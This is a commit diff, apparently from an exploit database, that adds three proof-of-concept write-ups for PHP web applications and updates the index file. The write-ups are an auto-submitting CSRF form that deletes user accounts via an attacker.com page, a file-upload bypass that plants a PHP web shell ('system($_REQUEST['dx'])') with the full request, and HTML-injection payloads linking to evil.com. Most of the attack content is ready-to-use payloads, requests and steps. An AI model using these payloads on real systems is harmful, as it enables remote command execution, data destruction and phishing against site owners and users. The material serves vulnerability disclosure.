DB: 2023-06-14

4 changes to exploits/shellcodes/ghdb Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution Online Examination System Project 1.0 - Cross-site request forgery (CSRF) Sales Tracker Management System v1.0 - Multiple Vulnerabilities Teachers Record Management System 1.0 - File Upload Type Validation
2023-06-14 00:16:24 +00:00 · 2023-06-14 00:16:24 +00:00 · ea8922f91d
commit ea8922f91d
parent 38cd2cd776
4 changed files with 205 additions and 1 deletions
--- a/exploits/php/webapps/51511.txt
+++ b/exploits/php/webapps/51511.txt
@ -0,0 +1,33 @@
+# Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)
+# Google Dork: n/a
+# Date: 09/06/2023
+# Exploit Author: Ramil Mustafayev (kryptohaker)
+# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php
+# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
+# Version: 1.0
+# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
+# CVE : n/a
+
+Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.
+
+To exploit this vulnerability, an attacker needs to do the following:
+
+1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/
+2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com
+3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:
+
+<html>
+  <body>
+    <form action="http://example.com/update.php" method="GET">
+      <input type="hidden" name="demail" value="victim@example.com" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html
+5. Send the URL of the HTML page to the admin user via email, social media, or any other means.
+
+If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.
--- a/exploits/php/webapps/51512.txt
+++ b/exploits/php/webapps/51512.txt
@ -0,0 +1,68 @@
+Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
+Date: 17-01-2023
+EXPLOIT-AUTHOR: AFFAN AHMED
+Vendor Homepage: <https://phpgurukul.com>
+Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>
+Version: 1.0
+Tested on: Windows 11 + XAMPP
+CVE : CVE-2023-3187
+
+===============================
+STEPS_TO_REPRODUCE
+===============================
+1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”
+Password: Test@123”
+2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
+3. Open the Burp-suite and Intercept the Edit Image Request
+4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”
+5. Change the **Content-type from “ image/png “ to “ image/gif “
+6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`
+7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**
+8. Below is the Burpsuite-POST Request for all the changes that I have made above
+
+==========================================
+BURPSUITE_REQUEST
+==========================================
+POST /trms/teacher/changeimage.php HTTP/1.1
+Host: localhost
+Content-Length: 442
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: <http://localhost>
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: <http://localhost/trms/teacher/changeimage.php>
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
+Connection: close
+
+------WebKitFormBoundaryndAPYa0GGOxSUHdF
+Content-Disposition: form-data; name="subjects"
+
+John Doe
+------WebKitFormBoundaryndAPYa0GGOxSUHdF
+Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
+Content-Type: image/gif
+
+GIF89a <?php echo system($_REQUEST['dx']); ?>
+
+------WebKitFormBoundaryndAPYa0GGOxSUHdF
+Content-Disposition: form-data; name="submit"
+
+
+------WebKitFormBoundaryndAPYa0GGOxSUHdF--
+
+
+===============================
+PROOF_OF_CONCEPT
+===============================
+GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
--- a/exploits/php/webapps/51513.txt
+++ b/exploits/php/webapps/51513.txt
@ -0,0 +1,100 @@
+Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities
+Google Dork: NA
+Date: 09-06-2023
+EXPLOIT-AUTHOR: AFFAN AHMED
+Vendor Homepage: <https://www.sourcecodester.com/>
+Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>
+Version: 1.0
+Tested on: Windows 11 + XAMPP
+CVE : CVE-2023-3184
+
+==============================
+CREDENTIAL TO USE
+==============================
+ADMIN-ACCOUNT
+USERNAME: admin
+PASSWORD: admin123
+
+=============================
+PAYLOAD_USED
+=============================
+1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
+2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
+3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
+4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
+
+
+===============================
+STEPS_TO_REPRODUCE
+===============================
+1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN  CREDENTIALS OF ADMIN
+2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user`
+3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename`  `lastname` and in `username`
+4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON
+5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER  IS ADDED  .
+6. AFTER CLICKING ON THE  EACH PAYLOAD IT REDIRECT ME TO EVIL SITE
+
+
+
+==========================================
+BURPSUITE_REQUEST
+==========================================
+POST /php-sts/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+Content-Length: 1037
+sec-ch-ua:
+Accept: */*
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
+sec-ch-ua-platform: ""
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/php-sts/admin/?page=user/manage_user
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
+Connection: close
+
+------WebKitFormBoundary7hwjNQW3mptDFOwo
+Content-Disposition: form-data; name="id"
+
+
+------WebKitFormBoundary7hwjNQW3mptDFOwo
+Content-Disposition: form-data; name="firstname"
+
+<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
+------WebKitFormBoundary7hwjNQW3mptDFOwo
+Content-Disposition: form-data; name="middlename"
+
+<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
+------WebKitFormBoundary7hwjNQW3mptDFOwo
+Content-Disposition: form-data; name="lastname"
+
+<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
+------WebKitFormBoundary7hwjNQW3mptDFOwo
+Content-Disposition: form-data; name="username"
+
+<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
+------WebKitFormBoundary7hwjNQW3mptDFOwo
+Content-Disposition: form-data; name="password"
+
+1234
+------WebKitFormBoundary7hwjNQW3mptDFOwo
+Content-Disposition: form-data; name="type"
+
+2
+------WebKitFormBoundary7hwjNQW3mptDFOwo
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary7hwjNQW3mptDFOwo--
+
+===============================
+PROOF_OF_CONCEPT
+===============================
+GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -16053,7 +16053,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48496,exploits/php/webapps/48496.txt,"Composr CMS 10.0.30 - Persistent Cross-Site Scripting",2020-05-21,"Manuel García Cárdenas",webapps,php,,2020-05-21,2020-05-21,0,,,,,,
 49190,exploits/php/webapps/49190.txt,"Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting",2020-12-04,"Parshwa Bhavsar",webapps,php,,2020-12-04,2020-12-04,0,,,,,,
 49749,exploits/php/webapps/49749.txt,"Composr CMS 10.0.36 - Cross Site Scripting",2021-04-07,"Orion Hridoy",webapps,php,,2021-04-07,2021-04-07,0,CVE-2021-30150,,,,,
-51060,exploits/php/webapps/51060.txt,"Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2021-46360,,,,,
+51060,exploits/php/webapps/51060.txt,"Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-06-13,1,CVE-2021-46360,,,,,
 2503,exploits/php/webapps/2503.txt,"compteur 2.0 - 'param_editor.php' Remote File Inclusion",2006-10-10,DarkFig,webapps,php,,2006-10-09,,1,OSVDB-29617;CVE-2006-5259,,,,,
 34536,exploits/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php,,2010-08-26,2014-09-05,1,,,,,,https://www.securityfocus.com/bid/42773/info
 33178,exploits/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",webapps,php,,2009-06-08,2014-05-04,1,CVE-2009-2704;OSVDB-56970,,,,,https://www.securityfocus.com/bid/36086/info
@ -24656,6 +24656,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43291,exploits/php/webapps/43291.txt,"Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2017-12-13,1,CVE-2017-17622,"SQL Injection (SQLi)",,,,
 48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php,,2020-05-18,2020-05-18,0,,,,,,
 48969,exploits/php/webapps/48969.txt,"Online Examination System 1.0 - 'name' Stored Cross Site Scripting",2020-10-29,"Nikhil Kumar",webapps,php,,2020-10-29,2020-10-29,0,,,,,,
+51511,exploits/php/webapps/51511.txt,"Online Examination System Project 1.0 - Cross-site request forgery (CSRF)",2023-06-13,"Ramil Mustafayev",webapps,php,,2023-06-13,2023-06-13,0,,,,,,
 51246,exploits/php/webapps/51246.txt,"Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)",2023-04-05,"Muhammad Navaid Zafar Ansari",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
 5889,exploits/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,2016-12-09,1,OSVDB-46485;CVE-2008-2890;OSVDB-46484;OSVDB-46483,,,,http://www.exploit-db.comoffl-0.2.6.zip,
 4374,exploits/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,webapps,php,,2007-09-06,2016-10-12,1,OSVDB-36944;CVE-2007-4809;OSVDB-36943,,,,http://www.exploit-db.comoffl-0.2.6.zip,
@ -28864,6 +28865,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7267,exploits/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,webapps,php,,2008-11-27,2017-01-04,1,OSVDB-57400;CVE-2008-7077,,,,,
 49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php,,2020-12-23,2020-12-23,0,,,,,,
 46840,exploits/php/webapps/46840.txt,"Sales ERP 8.1 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80,2019-05-14,2019-06-10,0,,"SQL Injection (SQLi)",,,,
+51513,exploits/php/webapps/51513.txt,"Sales Tracker Management System v1.0 - Multiple Vulnerabilities",2023-06-13,"AFFAN AHMED",webapps,php,,2023-06-13,2023-06-13,0,CVE-2023-3184,,,,,
 50659,exploits/php/webapps/50659.txt,"SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)",2022-01-13,"Betul Denizler",webapps,php,,2022-01-13,2022-01-13,0,,,,,,
 37642,exploits/php/webapps/37642.txt,"SaltOS - 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",webapps,php,,2012-08-18,2015-07-19,1,,,,,,https://www.securityfocus.com/bid/55117/info
 45734,exploits/php/webapps/45734.txt,"SaltOS Erp Crm 3.1 r8126 - Database File Download",2018-10-29,"Ihsan Sencan",webapps,php,80,2018-10-29,2018-10-29,0,CVE-2018-18762,,,,,
@ -30371,6 +30373,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php,,2021-06-16,2021-06-16,0,,,,,,
 50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php,,2021-06-16,2021-06-16,0,,,,,,
 49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php,,2021-02-15,2021-02-15,0,,,,,,
+51512,exploits/php/webapps/51512.txt,"Teachers Record Management System 1.0 - File Upload Type Validation",2023-06-13,"AFFAN AHMED",webapps,php,,2023-06-13,2023-06-13,0,CVE-2023-3187,,,,,
 2368,exploits/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - 'app_root' Remote File Inclusion",2006-09-14,PSYCH@,webapps,php,,2006-09-13,,1,OSVDB-28779;CVE-2006-4845,,,,,
 4785,exploits/php/webapps/4785.txt,"TeamCalPro 3.1.000 - Multiple Local/Remote File Inclusions",2007-12-25,GoLd_M,webapps,php,,2007-12-24,,1,OSVDB-39830;CVE-2007-6554;OSVDB-39829;OSVDB-39828;OSVDB-39827;OSVDB-39826;OSVDB-39825;OSVDB-39824;OSVDB-39823;OSVDB-39822;OSVDB-39821;OSVDB-39820;OSVDB-39819;OSVDB-39818;OSVDB-39817;OSVDB-39816;OSVDB-39815;OSVDB-39814;OSVDB-39813;OSVDB-39812;OSVDB-39811;OSVDB-39810;OSVDB-39809;OSVDB-39808;CVE-2007-6553;OSVDB-39807;OSVDB-39806;OSVDB-39805,,,,,
 48201,exploits/php/webapps/48201.py,"TeamCity Agent XML-RPC 10.0 - Remote Code Execution",2020-03-11,1F98D,webapps,php,,2020-03-11,2020-07-27,0,,,,,,